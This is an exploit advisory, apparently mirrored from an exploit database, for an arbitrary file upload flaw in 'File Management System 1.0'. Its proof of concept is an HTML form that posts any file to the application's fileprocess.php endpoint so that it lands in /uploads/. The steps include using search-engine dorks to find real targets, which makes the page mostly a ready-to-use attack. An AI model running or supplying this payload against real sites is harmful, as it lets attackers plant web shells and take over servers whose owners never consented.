File Management System 1.0 Arbitrary File Upload exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180410 ============================================================================================================================================= | # Title : File Management System 1.0 Arbitrary File upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181 | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Line 1 : Set your target. [+] Save As poc.html [+] Payload : <form name="" action="http://127.0.0.1/filemanagement/Private_Dashboard/fileprocess.php" method="POST" enctype="multipart/form-data"> <!-- Hidden Email Input --> <input type="hidden" name="email" value=""> <!-- File Input --> <label for="myfile">Upload File:</label> <input type="file" id="myfile" name="myfile" required> <!-- Submit Button --> <input type="submit" name="save" value="Save"> </form> [+] /uploads/ Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================